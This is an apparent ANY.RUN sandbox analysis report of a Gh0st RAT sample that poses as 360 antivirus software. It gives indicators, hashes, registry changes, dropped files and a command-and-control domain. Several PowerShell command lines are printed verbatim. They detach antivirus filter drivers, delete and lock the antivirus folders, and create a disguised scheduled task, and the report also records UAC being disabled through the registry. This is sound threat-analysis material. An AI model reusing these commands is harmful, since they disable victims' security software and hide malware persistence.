File name: 5.exe

Full analysis: https://app.any.run/tasks/1afe23f0-4890-494d-afa6-322db614d536
Verdict: Malicious activity
Threats:

Gh0st RAT is malware with advanced trojan functionality that lets attackers take full control of the victim's system. Its spying capabilities have made it a go-to tool for numerous criminal groups in high-profile attacks against government and corporate organizations. The most common infection vector for this malware is spam and phishing email.

Analysis date: December 19, 2024, 08:29:39
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: remote, rat, gh0st
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5: 0CCA6CAD8F404568494C4D12A6CB5C53
SHA1: E7D5D468FE2DA6D32419A4D4AE5CB888B075A8CD
SHA256: F62193FAAD9F9B8B3B81B904AAC6E5E9AB2B07EA19287A3C07DB898CCF123C41
SSDEEP: 98304:ODrpK4L00MTSMVr0Xb002l0M2s6jRzvy7KV3rt8nOBl6M8Q/kh5ANftsXJnJnu34:4o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • 5.exe (PID: 6560)
      • 5.exe (PID: 6392)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 3780)
      • powershell.exe (PID: 7192)
      • powershell.exe (PID: 7200)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 3780)
      • powershell.exe (PID: 7192)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 7208)
    • Changes powershell execution policy (Bypass)

      • iusb3mon.exe (PID: 6712)
    • UAC/LUA settings modification

      • iusb3mon.exe (PID: 6712)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 1020)
    • Connects to the CnC server

      • iusb3mon.exe (PID: 6712)
    • GH0ST has been detected (SURICATA)

      • iusb3mon.exe (PID: 6712)
  • SUSPICIOUS

    • Reads the Windows owner or organization settings

      • irsetup.exe (PID: 6608)
    • Reads security settings of Internet Explorer

      • irsetup.exe (PID: 6608)
      • ShellExperienceHost.exe (PID: 5032)
    • Executable content was dropped or overwritten

      • 5.exe (PID: 6560)
      • irsetup.exe (PID: 6608)
    • Reads the date of Windows installation

      • irsetup.exe (PID: 6608)
    • Renames file via Powershell

      • powershell.exe (PID: 6740)
      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 3780)
      • powershell.exe (PID: 2624)
      • powershell.exe (PID: 7192)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 7980)
      • powershell.exe (PID: 7728)
      • powershell.exe (PID: 3992)
    • Removes files via Powershell

      • powershell.exe (PID: 6740)
      • powershell.exe (PID: 6860)
      • powershell.exe (PID: 6884)
      • powershell.exe (PID: 6868)
      • powershell.exe (PID: 6912)
      • powershell.exe (PID: 3780)
      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 2624)
      • powershell.exe (PID: 7192)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 7980)
      • powershell.exe (PID: 7728)
      • powershell.exe (PID: 3992)
    • Hides errors and continues executing the command without stopping

      • powershell.exe (PID: 6740)
      • powershell.exe (PID: 3780)
      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 7192)
      • powershell.exe (PID: 2624)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 7980)
      • powershell.exe (PID: 7728)
      • powershell.exe (PID: 7200)
      • powershell.exe (PID: 3992)
    • Manipulates environment variables

      • powershell.exe (PID: 6860)
      • powershell.exe (PID: 6884)
      • powershell.exe (PID: 6912)
      • powershell.exe (PID: 6868)
    • Base64-obfuscated command line is found

      • iusb3mon.exe (PID: 6712)
    • The process bypasses the loading of PowerShell profile settings

      • iusb3mon.exe (PID: 6712)
    • Starts POWERSHELL.EXE for commands execution

      • iusb3mon.exe (PID: 6712)
      • irsetup.exe (PID: 6608)
    • Creates file in the system drive root

      • cmd.exe (PID: 7036)
      • iusb3mon.exe (PID: 6712)
    • Starts CMD.EXE for commands execution

      • iusb3mon.exe (PID: 6712)
    • Suspicious use of asymmetric encryption in PowerShell

      • iusb3mon.exe (PID: 6712)
      • irsetup.exe (PID: 6608)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6912)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6912)
    • Connects to unusual port

      • iusb3mon.exe (PID: 6712)
    • Probably obfuscated PowerShell command line is found

      • irsetup.exe (PID: 6608)
    • Contacting a server suspected of hosting a CnC

      • iusb3mon.exe (PID: 6712)
  • INFO

    • Checks supported languages

      • 5.exe (PID: 6560)
      • irsetup.exe (PID: 6608)
      • iusb3mon.exe (PID: 6712)
      • ShellExperienceHost.exe (PID: 5032)
    • The sample is compiled with Chinese language support

      • 5.exe (PID: 6560)
    • The sample is compiled with English language support

      • 5.exe (PID: 6560)
      • irsetup.exe (PID: 6608)
    • Create files in a temporary directory

      • 5.exe (PID: 6560)
      • SecEdit.exe (PID: 7680)
    • Process checks computer location settings

      • irsetup.exe (PID: 6608)
    • Reads the computer name

      • iusb3mon.exe (PID: 6712)
      • irsetup.exe (PID: 6608)
    • Reads the machine GUID from the registry

      • iusb3mon.exe (PID: 6712)
    • Sends debugging messages

      • iusb3mon.exe (PID: 6712)
    • Creates files in the program directory

      • iusb3mon.exe (PID: 6712)
    • The process uses the downloaded file

      • irsetup.exe (PID: 6608)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6532)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 7728)
      • powershell.exe (PID: 7980)
      • powershell.exe (PID: 3992)
No Malware configuration.

TRiD

.scr | Windows screen saver (76.6)
.exe | Generic Win/DOS Executable (11.7)
.exe | DOS Executable Generic (11.6)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2012:06:14 16:16:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 10
CodeSize: 25088
InitializedDataSize: 152064
UninitializedDataSize: -
EntryPoint: 0x2d1c
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
FileVersionNumber: 5.0.0.5096
ProductVersionNumber: 5.0.0.5096
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Chinese (Simplified)
CharacterSet: Unicode
CompanyName: 360.cn
FileDescription: 360杀毒 文件堡垒
FileVersion: 5, 0, 0, 5096
InternalName: 360FileGuard.exe
LegalCopyright: (C)360.cn All Rights Reserved.
OriginalFileName: 360FileGuard.exe
ProductName: 360杀毒
ProductVersion: 5, 0, 0, 5096
No data.
All screenshots are available in the full report
Total processes: 178
Monitored processes: 46
Malicious processes: 9
Suspicious processes: 7

Behavior graph

Behavior graph nodes (the rendered graph is in the full report): start, 5.exe, irsetup.exe, iusb3mon.exe (#GH0ST), and child processes marked "no specs": powershell.exe, conhost.exe, cmd.exe, schtasks.exe, secedit.exe, shellexperiencehost.exe and a second 5.exe instance.

Process information

PID: 1020
CMD: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: iusb3mon.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\syswow64\cmd.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\syswow64\kernelbase.dll
  • c:\windows\syswow64\apphelp.dll
  • c:\windows\syswow64\msvcrt.dll
PID: 2624
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: irsetup.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\windowspowershell\v1.0\powershell.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\apphelp.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\oleaut32.dll
  • c:\windows\system32\msvcp_win.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\combase.dll
PID: 3780
CMD: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: iusb3mon.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\syswow64\kernelbase.dll
  • c:\windows\syswow64\apphelp.dll
  • c:\windows\syswow64\msvcrt.dll
PID: 3992
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: irsetup.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\windowspowershell\v1.0\powershell.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\apphelp.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\oleaut32.dll
  • c:\windows\system32\msvcp_win.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\combase.dll
PID: 4388
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\conhost.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\msvcp_win.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\shcore.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\combase.dll
  • c:\windows\system32\rpcrt4.dll
PID: 4952
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\conhost.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\msvcp_win.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\shcore.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\combase.dll
  • c:\windows\system32\rpcrt4.dll
PID: 5032
CMD: "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
Path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Shell Experience Host
Version: 10.0.19041.3758 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\combase.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\rpcrt4.dll
  • c:\windows\system32\oleaut32.dll
  • c:\windows\system32\msvcp_win.dll
  • c:\windows\system32\wincorlib.dll
PID: 5556
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\conhost.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\msvcp_win.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\shcore.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\combase.dll
  • c:\windows\system32\rpcrt4.dll
PID: 6352
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\conhost.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\msvcp_win.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\shcore.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\combase.dll
  • c:\windows\system32\rpcrt4.dll
PID: 6368
CMD: schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Path: C:\Windows\SysWOW64\schtasks.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Task Scheduler Configuration Tool
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\syswow64\schtasks.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\syswow64\kernelbase.dll
  • c:\windows\syswow64\apphelp.dll
  • c:\windows\syswow64\msvcrt.dll
Total events: 63 855
Read events: 63 842
Write events: 9
Delete events: 4

Modification events

(PID) Process: (6712) iusb3mon.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation: write
Name: ConsentPromptBehaviorAdmin
Value: 0

(PID) Process: (6712) iusb3mon.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation: write
Name: EnableLUA
Value: 0

(PID) Process: (6712) iusb3mon.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation: write
Name: PromptOnSecureDesktop
Value: 0

(PID) Process: (5032) ShellExperienceHost.exe
Key: \REGISTRY\A\{328c6e10-6c41-255e-04f1-a01067554b7d}\LocalState
Operation: write
Name: PeekBadges
Value: 5B005D0000005BAE6831F051DB01

(PID) Process: (5032) ShellExperienceHost.exe
Key: \REGISTRY\A\{328c6e10-6c41-255e-04f1-a01067554b7d}\LocalState
Operation: write
Name: PeekBadges
Value: 5B005D000000239C6D31F051DB01

(PID) Process: (6712) iusb3mon.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: Microsoft
Value: C:\ProgramData\Program\iusb3mon.exe

(PID) Process: (6712) iusb3mon.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: Microsoft
Value: C:\ProgramData\Program\iusb3mon.exe

(PID) Process: (6712) iusb3mon.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: Microsoft
Value: C:\ProgramData\Program\iusb3mon.exe

(PID) Process: (6780) SecEdit.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
Operation: delete value
Name: LastWinlogonConfig
Value:

(PID) Process: (7632) SecEdit.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
Operation: delete value
Name: LastWinlogonConfig
Value:
Executable files: 3
Suspicious files: 10
Text files: 42
Unknown types: 0

Dropped files

PID: 6608
Process: irsetup.exe
Filename: C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG2.JPG
Type: image
MD5: AC40DED6736E08664F2D86A65C47EF60
SHA256: F35985FE1E46A767BE7DCEA35F8614E1EDD60C523442E6C2C2397D1E23DBD3EA

PID: 6560
Process: 5.exe
Filename: C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
Type: executable
MD5: 2A7D5F8D3FB4AB753B226FD88D31453B
SHA256: 879109AE311E9B88F930CE1C659F29EC0E338687004318661E604D0D3727E3CF

PID: 7036
Process: cmd.exe
Filename: C:\inst.ini
Type: text
MD5: 81051BCC2CF1BEDF378224B0A93E2877
SHA256: 7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6

PID: 6712
Process: iusb3mon.exe
Filename: C:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG2.JPG
Type: image
MD5: E39405E85E09F64CCDE0F59392317DD3
SHA256: CFD9677E1C0E10B1507F520C4ECD40F68DB78154C0D4E6563403D540F3BF829F

PID: 6740
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bw0n1n5m.o2r.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6712
Process: iusb3mon.exe
Filename: C:\Users\admin\AppData\Local\Temp\Xlpd 5 Update Log.txt
Type: text
MD5: 580C81A07189DBC37C161FA1E25B252F
SHA256: EB4ECEAFBE6BB1F9777A07F309AB2D059942A8283BEF24F416CE7BAE2A6B9167

PID: 6608
Process: irsetup.exe
Filename: C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.dat
Type: binary
MD5: 9F712C1DE55D81043196069AFC7078FF
SHA256: 65B6CB54F57D16B40988F56D28F9235071BD9E6CA70498C6946539AC80D4C59D

PID: 6912
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_20sfpa2v.hm3.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6712
Process: iusb3mon.exe
Filename: C:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG3.JPG
Type: binary
MD5: 9CA19B0ABBD0BBF8C01D835AABE36C0E
SHA256: 568BA3C29FFB6BC581602235D46210989831B00689F369B965ABBA061A042C02

PID: 6712
Process: iusb3mon.exe
Filename: C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Type: xml
MD5: 69C282FDCD177C1AC4D6709EF841DA65
SHA256: 943F169C31C319417E61586D8911057321DE04926E01E4CC3E6F57B3B032C28E
HTTP(S) requests: 7
TCP/UDP connections: 61
DNS requests: 18
Threats: 1

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.49:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
 | | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
7104 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
7104 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
6252 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
 | | 192.168.100.255:137 | | | | whitelisted
4160 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
2736 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5064 | SearchApp.exe | 2.23.209.137:443 | www.bing.com | Akamai International B.V. | GB | whitelisted
 | | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
1076 | svchost.exe | 184.28.89.167:443 | go.microsoft.com | AKAMAI-AS | US | whitelisted
1176 | svchost.exe | 20.190.160.20:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
  • 40.127.240.158
whitelisted
www.bing.com
  • 2.23.209.137
  • 2.23.209.142
  • 2.23.209.149
  • 2.23.209.144
  • 2.23.209.143
  • 2.23.209.135
  • 2.23.209.140
  • 2.23.209.141
  • 2.23.209.148
whitelisted
google.com
  • 142.250.185.238
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
login.live.com
  • 20.190.160.20
  • 40.126.32.136
  • 40.126.32.138
  • 20.190.160.14
  • 40.126.32.72
  • 40.126.32.140
  • 40.126.32.68
  • 40.126.32.134
whitelisted
k2.laomaogege2.com
  • 118.107.32.227
unknown
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.106
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted

Threats

1 ETPRO signatures available at the full report
Process | Message
iusb3mon.exe | Thread running...
iusb3mon.exe | Thread running...
iusb3mon.exe | Thread running...
iusb3mon.exe | Thread running...
iusb3mon.exe | Thread running...
iusb3mon.exe | Thread running...
iusb3mon.exe | Thread running...
iusb3mon.exe | Thread running...
iusb3mon.exe | Thread running...
iusb3mon.exe | Thread running...